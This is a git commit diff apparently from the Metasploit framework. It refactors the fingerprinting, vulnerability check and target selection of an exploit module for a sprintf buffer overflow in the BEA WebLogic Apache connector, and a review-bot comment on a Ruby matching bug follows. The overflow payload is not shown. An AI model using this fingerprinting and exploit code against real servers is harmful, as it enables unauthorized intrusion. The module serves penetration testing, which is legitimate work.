trying to improve bea weblogic connector bof

This commit is contained in:
jvazquez-r7 2012-05-18 01:13:56 +02:00
parent c0d17734ed
commit e7f5bf132c
1 changed files with 54 additions and 54 deletions


@ -22,12 +22,14 @@ class Metasploit3 < Msf::Exploit::Remote
Weblogic Apache plugin. Weblogic Apache plugin.
The connector fails to properly handle specially crafted HTTP POST The connector fails to properly handle specially crafted HTTP POST
requests, resulting a buffer overflow due to the insecure usage requests resulting in a buffer overflow due to the insecure usage
of sprintf. Currently, this module works over Windows systems without DEP, of sprintf.
and has been tested with Windows 2000 / XP.
In addition, the Weblogic Apache plugin version is fingerprinted with a POST The Weblogic Apache plugin version is fingerprinted with a POST
request containing a specially crafted Transfer-Encoding header. request containing a specially crafted Transfer-Encoding header.
At this moment this module works over Windows systems without DEP
and has been tested with Windows 2000 / XP.
}, },
'Author' => 'Author' =>
[ [
@ -84,50 +86,22 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
my_data = rand_text_alpha(rand(5) + 8) fingerprint = fingerprint_mod_wl
res = send_request_cgi({
'method' => 'POST',
'uri' => target_uri.path,
'headers' =>
{
'Transfer-Encoding' => my_data
},
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
})
if res and res.code == 200
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
res.body =~ /Change Number:<\/B> <I>779586/
return Exploit::CheckCode::Vulnerable
end
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
if res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
res.body =~ /Change Number:<\/B> <I>616810/
return Exploit::CheckCode::Vulnerable
end
# BEA WebLogic 8.1 SP4 - mod_wl_20.so
if res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
res.body =~ /Change Number:<\/B> <I>452998/
return Exploit::CheckCode::Vulnerable
end
# Check for dates prior to patch release
if res.body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
build_date = Date.parse($1)
if build_date <= Date.parse("Jul 28 2008")
return Exploit::CheckCode::Appears
end
end
case fingerprint
when /Version found/
return Exploit::CheckCode::Vulnerable
when /BEA WebLogic connector vulnerable/
return Exploit::CheckCode::Appears
when /BEA WebLogic connector undefined/
return Exploit::CheckCode::Detected
when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/
return Exploit::CheckCode::Safe
end end
return Exploit::CheckCode::Safe
end end
def exploit def exploit
@ -159,6 +133,23 @@ class Metasploit3 < Msf::Exploit::Remote
return target if target.name != 'Automatic' return target if target.name != 'Automatic'
fingerprint = fingerprint_mod_wl
case fingerprint
when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/
return targets[1]
when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/
return targets[2]
when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/
return targets[3]
else
return nil
end
end
def fingerprint_mod_wl
my_data = rand_text_alpha(rand(5) + 8) my_data = rand_text_alpha(rand(5) + 8)
res = send_request_cgi( res = send_request_cgi(
{ {
@ -171,22 +162,31 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n", 'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
}) })
if res and res.code == 200 if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/
# BEA WebLogic 8.1 SP6 - mod_wl_20.so # BEA WebLogic 8.1 SP6 - mod_wl_20.so
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and case res.body
res.body =~ /Change Number:<\/B> <I>779586/ when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/)
return targets[1] return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"
# BEA WebLogic 8.1 SP5 - mod_wl_20.so # BEA WebLogic 8.1 SP5 - mod_wl_20.so
elsif res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and when (/Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/)
res.body =~ /Change Number:<\/B> <I>616810/ return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"
return targets[2] when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/)
elsif res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"
res.body =~ /Change Number:<\/B> <I>452998/ # Check for dates prior to patch release
return targets[3] when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
build_date = Date.parse($1)
if build_date <= Date.parse("Jul 28 2008")
return "BEA WebLogic connector vulnerable"
else
return "BEA WebLogic connector no vulnerable"
end
else
return "BEA WebLogic connector undefined"
end end
end end
return nil return "BEA WebLogic connector not found"
end end
end end
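Review bot: The `when (/Build date\/time:.../ and /Change Number:.../)` arms in fingerprint_mod_wl (last hunk) do not test both patterns: `and` between two regex literals evaluates to the second literal because the first is simply truthy, so each arm matches the body on the Change Number alone and the build-date check is silently dropped. Any response whose Change Number matches is reported as that exact version regardless of its build date, which is weaker than the if/elsif chain this commit replaced, where both `res.body =~` tests had to pass. Restoring that shape while keeping the new return strings fixes it, as sketched below; `check` and the automatic-target branch match on those strings, so they must stay verbatim. The `def fingerprint_mod_wl` line is in the previous hunk. Separately, `Date.parse($1)` in the date branch raises ArgumentError for a three-letter token that is not a month name and nothing here rescues it, though that behaviour predates this commit.
```ruby
if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/
  # BEA WebLogic 8.1 SP6 - mod_wl_20.so
  if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
     res.body =~ /Change Number:<\/B> <I>779586/
    return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"
  # BEA WebLogic 8.1 SP5 - mod_wl_20.so
  elsif res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
        res.body =~ /Change Number:<\/B> <I>616810/
    return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"
  # BEA WebLogic 8.1 SP4 - mod_wl_20.so
  elsif res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
        res.body =~ /Change Number:<\/B> <I>452998/
    return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"
  # Check for dates prior to patch release
  elsif res.body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
    # … unchanged: build_date comparison returning "vulnerable" / "no vulnerable" …
  else
    return "BEA WebLogic connector undefined"
  end
end
```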